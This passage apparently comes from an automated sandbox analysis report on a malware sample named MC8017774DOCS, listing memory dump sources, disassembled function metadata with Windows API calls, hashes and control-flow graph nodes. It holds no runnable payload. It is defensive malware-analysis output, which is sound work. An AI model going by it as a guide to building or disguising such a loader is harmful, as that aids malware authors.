                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                    • API String ID: 2709904686-3125694417
                                                                                                                                                    • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                    • Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
                                                                                                                                                    • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                    • Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD
                                                                                                                                                    Function 6E9B10E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 6E9B116A
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B11C7
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B11D9
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6E9B1203
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                    • Opcode ID: 85a0b8a2d4a20bb74223fb6a93fc2d1590d73439ba9b351c36c6233761c75a81
                                                                                                                                                    • Instruction ID: a0b9b72749b6043e650913a186ec3d65f32c266c3dbef7ca9d1ff5125d52e49f
                                                                                                                                                    • Opcode Fuzzy Hash: 85a0b8a2d4a20bb74223fb6a93fc2d1590d73439ba9b351c36c6233761c75a81
                                                                                                                                                    • Instruction Fuzzy Hash: 41316FB29082169FEB008FEAD845A6B77ECEF57310700092AE944D7254E774DD4A9F61
                                                                                                                                                    Function 00405CF2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                    • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                    • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                                                                                                    • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                    • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:11.6%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:41
                                                                                                                                                    Total number of Limit Nodes:4
                                                                                                                                                    execution_graph 6919 3e466d0 6920 3e46738 CreateWindowExW 6919->6920 6922 3e467f4 6920->6922 6876 3e44228 6878 3e44259 6876->6878 6879 3e442a5 6876->6879 6877 3e44265 6878->6877 6881 3e444a0 6878->6881 6884 3e444e0 6881->6884 6882 3e444aa 6882->6879 6885 3e44524 6884->6885 6886 3e44501 6884->6886 6885->6882 6886->6885 6887 3e44728 GetModuleHandleW 6886->6887 6888 3e44755 6887->6888 6888->6882 6889 3e46888 6890 3e468ae 6889->6890 6893 3e43a94 6890->6893 6894 3e43a9f 6893->6894 6895 3e47a49 6894->6895 6897 3e47a39 6894->6897 6909 3e43bbc 6895->6909 6901 3e47b60 6897->6901 6905 3e47b70 6897->6905 6898 3e47a47 6903 3e47b84 6901->6903 6902 3e47c10 6902->6898 6913 3e47c28 6903->6913 6907 3e47b84 6905->6907 6906 3e47c10 6906->6898 6908 3e47c28 CallWindowProcW 6907->6908 6908->6906 6910 3e43bc7 6909->6910 6911 3e48eaa CallWindowProcW 6910->6911 6912 3e48e59 6910->6912 6911->6912 6912->6898 6914 3e47c39 6913->6914 6916 3e48de2 6913->6916 6914->6902 6917 3e43bbc CallWindowProcW 6916->6917 6918 3e48dfa 6917->6918 6918->6914 6923 3e4b978 6925 3e4b9dd 6923->6925 6924 3e4be40 WaitMessage 6924->6925 6925->6924 6926 3e4ba2a 6925->6926

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 03E4B978 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 0 3e4b978-3e4b9db 1 3e4b9dd-3e4ba07 0->1 2 3e4ba0a-3e4ba28 0->2 1->2 7 3e4ba31-3e4ba68 2->7 8 3e4ba2a-3e4ba2c 2->8 12 3e4ba6e-3e4ba82 7->12 13 3e4be99 7->13 10 3e4beea-3e4beff 8->10 14 3e4ba84-3e4baae 12->14 15 3e4bab1-3e4bad0 12->15 16 3e4be9e-3e4beb4 13->16 14->15 22 3e4bad2-3e4bad8 15->22 23 3e4bae8-3e4baea 15->23 16->10 25 3e4badc-3e4bade 22->25 26 3e4bada 22->26 27 3e4baec-3e4bb04 23->27 28 3e4bb09-3e4bb12 23->28 25->23 26->23 27->16 29 3e4bb1a-3e4bb21 28->29 30 3e4bb23-3e4bb29 29->30 31 3e4bb2b-3e4bb32 29->31 32 3e4bb3f-3e4bb5c call 3e4a588 30->32 33 3e4bb34-3e4bb3a 31->33 34 3e4bb3c 31->34 37 3e4bcb1-3e4bcb5 32->37 38 3e4bb62-3e4bb69 32->38 33->32 34->32 39 3e4be84-3e4be97 37->39 40 3e4bcbb-3e4bcbf 37->40 38->13 41 3e4bb6f-3e4bbac 38->41 39->16 42 3e4bcc1-3e4bcd4 40->42 43 3e4bcd9-3e4bce2 40->43 49 3e4bbb2-3e4bbb7 41->49 50 3e4be7a-3e4be7e 41->50 42->16 44 3e4bce4-3e4bd0e 43->44 45 3e4bd11-3e4bd18 43->45 44->45 47 3e4bdb7-3e4bdcc 45->47 48 3e4bd1e-3e4bd25 45->48 47->50 63 3e4bdd2-3e4bdd4 47->63 52 3e4bd54-3e4bd76 48->52 53 3e4bd27-3e4bd51 48->53 54 3e4bbe9-3e4bbfe call 3e4b564 49->54 55 3e4bbb9-3e4bbc7 call 3e4a594 49->55 50->29 50->39 52->47 90 3e4bd78-3e4bd82 52->90 53->52 61 3e4bc03-3e4bc07 54->61 55->54 65 3e4bbc9-3e4bbe7 call 3e4a5a0 55->65 66 3e4bc78-3e4bc85 61->66 67 3e4bc09-3e4bc1b call 3e4b570 61->67 68 3e4bdd6-3e4be0f 63->68 69 3e4be21-3e4be3e call 3e4a588 63->69 65->61 66->50 82 3e4bc8b-3e4bc95 call 3e4b580 66->82 94 3e4bc1d-3e4bc4d 67->94 95 3e4bc5b-3e4bc73 67->95 85 3e4be11-3e4be17 68->85 86 3e4be18-3e4be1f 68->86 69->50 81 3e4be40-3e4be6c WaitMessage 69->81 87 3e4be73 81->87 88 3e4be6e 81->88 96 3e4bca4-3e4bcac call 3e4b598 82->96 97 3e4bc97-3e4bc9f call 3e4b58c 82->97 85->86 86->50 87->50 88->87 101 3e4bd84-3e4bd8a 90->101 102 3e4bd9a-3e4bd9d 90->102 104 3e4bc54 94->104 105 3e4bc4f 94->105 95->16 96->50 97->50 108 3e4bd8c 101->108 109 3e4bd8e-3e4bd90 101->109 110 3e4bda6-3e4bdb5 102->110 104->95 105->104 108->102 109->102 110->47 110->90
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.3453385306.0000000003E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_4_2_3e40000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1160f10f29f4030caa622c6bf5d6354a31114a88a5006855045e692209d0eb04
                                                                                                                                                    • Instruction ID: e9b20345529c9ae971ddac41081e8616af69ada3b09ddde12c51b9d3c1b60a7a
                                                                                                                                                    • Opcode Fuzzy Hash: 1160f10f29f4030caa622c6bf5d6354a31114a88a5006855045e692209d0eb04
                                                                                                                                                    • Instruction Fuzzy Hash: A0F16B34A0030ACFDB14CFA9D984B9DBBF1FF88304F199269D545AB265DB74E846CB80
                                                                                                                                                    Function 03E444E0 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 112 3e444e0-3e444ff 113 3e44501-3e4450e call 3e438b0 112->113 114 3e4452b-3e4452f 112->114 120 3e44524 113->120 121 3e44510 113->121 116 3e44531-3e4453b 114->116 117 3e44543-3e44584 114->117 116->117 123 3e44586-3e4458e 117->123 124 3e44591-3e4459f 117->124 120->114 166 3e44516 call 3e44788 121->166 167 3e44516 call 3e44779 121->167 123->124 125 3e445a1-3e445a6 124->125 126 3e445c3-3e445c5 124->126 128 3e445b1 125->128 129 3e445a8-3e445af call 3e438bc 125->129 131 3e445c8-3e445cf 126->131 127 3e4451c-3e4451e 127->120 130 3e44660-3e44720 127->130 133 3e445b3-3e445c1 128->133 129->133 161 3e44722-3e44725 130->161 162 3e44728-3e44753 GetModuleHandleW 130->162 134 3e445d1-3e445d9 131->134 135 3e445dc-3e445e3 131->135 133->131 134->135 138 3e445e5-3e445ed 135->138 139 3e445f0-3e445f9 135->139 138->139 142 3e44606-3e4460b 139->142 143 3e445fb-3e44603 139->143 144 3e4460d-3e44614 142->144 145 3e44629-3e44636 142->145 143->142 144->145 147 3e44616-3e44626 call 3e41adc call 3e438cc 144->147 152 3e44638-3e44656 145->152 153 3e44659-3e4465f 145->153 147->145 152->153 161->162 163 3e44755-3e4475b 162->163 164 3e4475c-3e44770 162->164 163->164 166->127 167->127
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 03E44746
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.3453385306.0000000003E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_4_2_3e40000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    • Opcode ID: c4ecbdf1314c9a623d20705bf9b01a3b40f139e9a9a65b5502227acddad63511
                                                                                                                                                    • Instruction ID: 7889bd0f4671fb439f6751de71f1c06e3e4ab3e3d1434555df101fa349ccedd8
                                                                                                                                                    • Opcode Fuzzy Hash: c4ecbdf1314c9a623d20705bf9b01a3b40f139e9a9a65b5502227acddad63511
                                                                                                                                                    • Instruction Fuzzy Hash: C1814970A00B458FDB24DF6AE14575ABBF1FF88204F048A6ED44ADBA90DB74E845CF91
                                                                                                                                                    Function 03E466C4 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 168 3e466c4-3e46736 169 3e46741-3e46748 168->169 170 3e46738-3e4673e 168->170 171 3e46753-3e4678b 169->171 172 3e4674a-3e46750 169->172 170->169 173 3e46793-3e467f2 CreateWindowExW 171->173 172->171 174 3e467f4-3e467fa 173->174 175 3e467fb-3e46833 173->175 174->175 179 3e46835-3e46838 175->179 180 3e46840 175->180 179->180 181 3e46841 180->181 181->181
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03E467E2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.3453385306.0000000003E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_4_2_3e40000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                                    • Opcode ID: 5498c313c822ef021a314e07018be6b454573a900895b4b8290d9da8b3a21d78
                                                                                                                                                    • Instruction ID: 7ebc67461c93a34bb449daf9a334d4b03b6079ed79666d171d2e650171991bae
                                                                                                                                                    • Opcode Fuzzy Hash: 5498c313c822ef021a314e07018be6b454573a900895b4b8290d9da8b3a21d78
                                                                                                                                                    • Instruction Fuzzy Hash: 3351C1B1D00349DFDB14CF99D984ADEFBB1BF48314F24922AE819AB210D7719845CF90
                                                                                                                                                    Function 03E466D0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 182 3e466d0-3e46736 183 3e46741-3e46748 182->183 184 3e46738-3e4673e 182->184 185 3e46753-3e467f2 CreateWindowExW 183->185 186 3e4674a-3e46750 183->186 184->183 188 3e467f4-3e467fa 185->188 189 3e467fb-3e46833 185->189 186->185 188->189 193 3e46835-3e46838 189->193 194 3e46840 189->194 193->194 195 3e46841 194->195 195->195
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03E467E2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.3453385306.0000000003E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_4_2_3e40000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                                    • Opcode ID: c967d4d493579128775cfdaa08709989d9e11b0f559f05843544283f77ca0b77
                                                                                                                                                    • Instruction ID: 2b558e66c57f800ba7f7c85c6a840cb288a776f74c6e5187712fcd25eb4e2ac3
                                                                                                                                                    • Opcode Fuzzy Hash: c967d4d493579128775cfdaa08709989d9e11b0f559f05843544283f77ca0b77
                                                                                                                                                    • Instruction Fuzzy Hash: 1241BEB1D003499FDB14CF9AD984ADEFFB5BF48314F24922AE819AB210D775A845CF90
                                                                                                                                                    Function 03E43BBC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 196 3e43bbc-3e48e4c 199 3e48e52-3e48e57 196->199 200 3e48efc-3e48f1c call 3e43a94 196->200 202 3e48e59-3e48e90 199->202 203 3e48eaa-3e48ee2 CallWindowProcW 199->203 207 3e48f1f-3e48f2c 200->207 210 3e48e92-3e48e98 202->210 211 3e48e99-3e48ea8 202->211 204 3e48ee4-3e48eea 203->204 205 3e48eeb-3e48efa 203->205 204->205 205->207 210->211 211->207
                                                                                                                                                    APIs
                                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 03E48ED1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.3453385306.0000000003E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_4_2_3e40000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallProcWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2714655100-0
                                                                                                                                                    • Opcode ID: 04badba8a1d30b08ace60d57f3ddaf0db4fe03aa9bfe712e7bb4c211493d208d
                                                                                                                                                    • Instruction ID: 0efbc03a0eb11ac39356ea1f3b98da3bdb4f2e1dc18b55955e8844b08d64557b
                                                                                                                                                    • Opcode Fuzzy Hash: 04badba8a1d30b08ace60d57f3ddaf0db4fe03aa9bfe712e7bb4c211493d208d
                                                                                                                                                    • Instruction Fuzzy Hash: 754147B4900309DFDB14CF99C888AAAFBF5FF8C314F248549E519AB321D775A841CBA1
                                                                                                                                                    Function 03E446E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 213 3e446e0-3e44720 214 3e44722-3e44725 213->214 215 3e44728-3e44753 GetModuleHandleW 213->215 214->215 216 3e44755-3e4475b 215->216 217 3e4475c-3e44770 215->217 216->217
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 03E44746
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.3453385306.0000000003E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_4_2_3e40000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    • Opcode ID: 7ef950803981ec7c7279c76adbf0bdfd2cc93c4a4d1d4f6f88e44d6ace3f416e
                                                                                                                                                    • Instruction ID: a4d81e7ca203c45586760bd69c0184fe5f58baf5c26cc56c521ab95bf8ccada2
                                                                                                                                                    • Opcode Fuzzy Hash: 7ef950803981ec7c7279c76adbf0bdfd2cc93c4a4d1d4f6f88e44d6ace3f416e
                                                                                                                                                    • Instruction Fuzzy Hash: 90113FB6D007098FCB10CF9AD544B9EFBF4BF89224F11851AD468A7200C3B9A505CFA1